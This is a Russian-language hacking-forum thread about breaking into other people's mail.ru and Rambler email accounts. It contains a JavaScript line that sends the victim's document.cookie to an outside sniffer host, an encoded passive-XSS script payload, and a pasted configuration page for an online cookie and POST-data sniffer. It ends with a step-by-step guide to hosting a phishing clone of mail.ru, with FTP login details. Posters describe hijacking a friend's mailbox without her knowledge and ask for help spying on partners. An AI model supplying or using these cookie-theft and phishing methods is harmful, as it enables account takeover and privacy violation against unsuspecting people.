я надеюсь все поняли что эта ссылка его
Цитата:

Сообщение от t0xA

img = new Image(); img.src = "http://httpz.ru/nrwlwmemn5w.gif?"+document.cookie;

Зачёт. А говорил , что по взому мыла не шпаришь=)

а если жетва не откроет картинку как написано в примере, но она автоматически загрузиться сценарий сработает?

Цитата:

Сообщение от t0xA

несработает, потомучто она откроет на компе а не в сайте.

блин я не то имел ввиду.
вот к примеру я ему отправляю открытку, он просматривает письмо и картинка сама по себе загрузилась, но без его помощи. просто я замечал, что маил.ру автоматически загружает некоторые картинки.

Доброго времени суток! А как взломать почту на рамблере? спасибо

Цитата:


Доброго времени суток! А как взломать почту на рамблере? спасибо



Хороший вопрос)
Тебе сюда http://hpc.name/showthread.php?t=4799

у меня все равно куки не пришли...подскажите подалуйста что надо писать в личных настройках в строку"Пассивная XSS"это здесь на снифере!!

не!!!не покатит!!просто так некто не будет вводить скрипты в строку!!!

Цитата:

Сообщение от Cryptor

Это ссылка на сниффер!

ясно. я могу как то им пользоваться или надо свой сайт для сниффа делать? киньте плиз ссылочку на подробное обьяснение. спасибо.

я так и не понял куда вставлять "Код для пассивной XSS атаки"!!подскажите пожалуйста!!!

а что обязательно надо вводить жертве этот скрипт???я вчера без этого получил куки подруги(она не знала что я собирался делать)и взломал ее....тока не помню какой скрипт использовал((((((

Добавлено через 4 минуты
еще вопрос!!!куда вставлять строчку"Код для пассивной XSS атаки-она у меня %3CSCRIPT type=text/javascript src=http://httpz.ru/7z2fnrl17zgo.js>"
заранее спс!!

Сначала тут найди нужную пассивку http://hpc.name/showthread.php?t=2865%DD

щас найду))))спс!!отпишусь!

Добавлено через 2 минуты
а как определить нужная она или нет??вот мне например понравилась эта http://qiq.ru/s.php?type=1&q=%22%3E%...E&sort=0&ord=0 что дальше с ней делать?

Ты берешь не ту которая тебе понравилась))Там над каждой ХСС написана для чего она)Эта вообще для qiq))

а там нет для mail((((((мне очень надо!!и еще...что такое qiq??не удивляйся моей тупизне)))))я новичок в этом деле!!

Напиши что типо тебе нада пасивная ХСС для mail.ru и должны по идее выложить))Зайди на сайт qiq.ru и узнаешь)

у тебя есть пасивка для mail.ru??

Добавлено через 1 минуту
ну представим мне выложут....что дальше с ней делать???

Добавлено через 1 минуту
ты не против если я тебе в аську добавлю??

Братан-бар, поясни мне плиз.
Чё это за ссылка? http://httpz.ru/nrwlwmemn5w.gif как мне сделать аналогичный инструмент?
спасибо.

Цитата:

Сообщение от qpayct

Чё это за ссылка? http://httpz.ru/nrwlwmemn5w.gif

Это ссылка на сниффер!

Зачот спасиб !!!

Зачот)))Теперь я думаю дурацких вопросов про куки и снифер действительно станет меньше))

Помогите взломать мыло срочно нужно очень?перепробывал все вчера брутил 9 часов заняло но некак я уже незнаю что и делать прошу помощи.
Кто может помоч пишите в аген ysa1989@mail.ru
p/s Помогите ребята!!!

Цитата:

Сообщение от Гнат

Спасибо, но я когда загружаю файлы с расширением img то они просто открываються блокнотом и ничего не происходит. Что делать? Как сделать так чтобы при открытии этого файла исполнялся сценарий? Заранее благодарен

где ты его открываешь , на почте или на компе?

Спасибо, но я когда загружаю файлы с расширением img то они просто открываються блокнотом и ничего не происходит. Что делать? Как сделать так чтобы при открытии этого файла исполнялся сценарий? Заранее благодарен

И там и там

Цитата:

Сообщение от Гнат

И там и там

просто на компе нажми, открить с помощью: и выбери программу для просмотра картинок, после нажми галочку использовать всегда.

нашол пассивку для майил а что с ней сделать куда вставить, просто вставить в хсс или еще чтото надо? подскажите

здравствуйте.помогите,пожа луйста в таком вопросе.прочитала много информации,пробовала тоже много чего.попробовала сниффер,или я что-то не так делаю,но испытала на своём мыле.мне возращается сообщение обратно как спам.а очень надо открыть почтовый ящик своего парня.может я делаю что-то не так?подскажите пожалуйста.у меня решается моя судьба и очень срочно надо его проверить.кто может рассказать подробно о взломе почты,напишите пожалуйста в личку.

К сожалению ничего не получается((( Пробовал открыть с помощью программы для просмотров факсов и картинок. Ничего. Может я просто не тем открыл?

ПОЖАЛУЙСТА Скажите как заполнит онлайн сниффер
наверняка мне надо настроит эту страничку но я незнаю
а там такие вопросы :
Настройки

Вместо httpz.ru можете использовать айпи 91.196.0.204. Поддерживается HTTPS.
Записывать ip в лог
Пассивная XSS
url xss
Например (http://site.com/xss.php?id=">)http://site.com/xss.php?id=%22%3E (где есть пассивная xss уязвимость). Сам javascript код писать не нужно, он автоматически допишется скриптом
url на редирект
Страница, куда перенаправится пользователь после кражи кукис (указывать с префиксом http://)
База пассивных xss на форуме
url для пассивной XSS
http://httpz.ru/6nyms4a5ujq
Код размещения xss фрейма на странице
Код для пассивной XSS атаки
[ Вставлять после "> ]
Картинка 1x1px
http://httpz.ru/n6nyms4a5uj.gif
html код
bb код
JavaScript код
JavaScript код с редиректом
JavaScript код для адресной строки
JavaScript код для адресной строки c редиректом
Картинка 320x240px
http://httpz.ru/c6nyms4a5uj.gif
Картинка 640x480px
http://httpz.ru/s6nyms4a5uj.gif
Random анимация
http://httpz.ru/a6nyms4a5uj.gif
Random картинка
http://httpz.ru/r6nyms4a5uj.gif
Пользовательское изображение
Не загружено
Разрешены расширения .jpg, .jpeg, .gif, .png
Перехват POST запроса
http://httpz.ru/post/6nyms4a5uj
Скрипт перехватывает POST запрос (ключи и параметры) и пишет их в ваш лог. Для того чтобы перехватить POST запрос нужно заменить в html коде формы атрибут action на скрипт-обработчик, который перехватывает запрос. Если установлено поле urltogogo, то после перехвата POST запроса пользователь автоматически перенаправляется на заданную страницу (указывать обязательно с префиском http://). Функция предназначены только для отладки своих скриптов.
как мне надо заполнит для www.mail.ru

А рамблер так же можно взломать с помощью снифера?или только майл?

Цитата:

Сообщение от WhWolf

А рамблер так же можно взломать с помощью снифера?или только майл?

да любой сайт...

t0xA
запиши видео плиз)

Видео по снифферу: http://www.sin3v.org/instruction.php

Цитата:

Сообщение от realtek

Я так понял в действительности никаких программ для взлома не существует...фейки снифферы и прочее все зависит от жертвы так??

Да!

realtek скажи а ты языки программирования знаешь??
если знаешь напиши прогу для взлома паролей))

P.S программ для взлома(тип укажи имя пользават нажми на кнопку и пароль жертвы у тя) не существует и написать их невозвожно (кроме конешно самого падбора паролей - но бруты эт не выход)
если что не правильно написал - подправте

Видео бы сняли по взлома майла и вопросов точно бы стало меньше 100%

Видео будет?

взломать мыла на mail.ru с помощью фейка.
Что нам надо?
1.Фейк на mail.ru скачать...
2.Хост на http://www.1gb.ru или на каком нибуть другом хостинге.
3.Программа CuteFtp.8.2.0.pro.build скачать...
4.Зарегить мыло на mail.ru (пример: otkrytka_mailru@mail.ru).
5. Голова с мозгами).
Первый шаг:
Регистрируем мыло на mail.ru типа otkrytka_mailru@mail.ru.
Второй шаг:
Регистрируемся на хосте http://www.1gb.ru


[img]http://hpc.name/imagehost/2009/10/17/

thumb_195094ad997f65858a.jpg[/img]


Нажимаем на "Заказать хостинг и регистрацию зтого домена"



Теперь можно проверить почтовый ящик на наличие писем который мы вписали при регистрации

Мы видим на нашем мыле 2 письма. Открываем их и следуем инструкции. В одном из письме мы видим логин и пароль доступа на наш акаунт на сайт http://www.1gb.ru
Входим в наш акаунт используя полученный лог и пас

В правой части находим вот такую фразу "Пароли на ресурсы (FTP, почта, mySQL)" и заходи туда.
Там мы видим дохрена всякой инфы, но нам нужна вот эта, смотрите на скрин:

Из этого следует что наш Фейк будет находится по этому адресу http://otkrytka-mai-ru.1gb.ru.
Наш FTP Сервет будет: otkrytka-mai-ru.1gb.ru
Логин: 1gb_otkrytka-mai-ru
Пароль: aaea4530
Третий шаг:
Устанавливаем программу CuteFtp.8.2.0.pro.build. Установили? Вносим туда наши регистрационные данные


Нажимаем Connect и попадаем вот сюда. Смотрим скрин

Заходим в папку http и всё от туда удаляем

Перед тем как залить сюда нашу фенечку заходим вот в этот файл login.php и вписываем строку куда мы пошлём нашу жертву после подтверждения регистрации (можете не вписывать я это за вас сделал)
Теперь можно и залить… Заливаем
Теперь наш Фейк готов.
При регистрации мы получили вот этот адрес (я его писал выше) http://otkrytka-mai-ru.1gb.ru
Заходим на него и что мы видим, а видим мы клон сайта для подтверждения регистрации на mail.ru.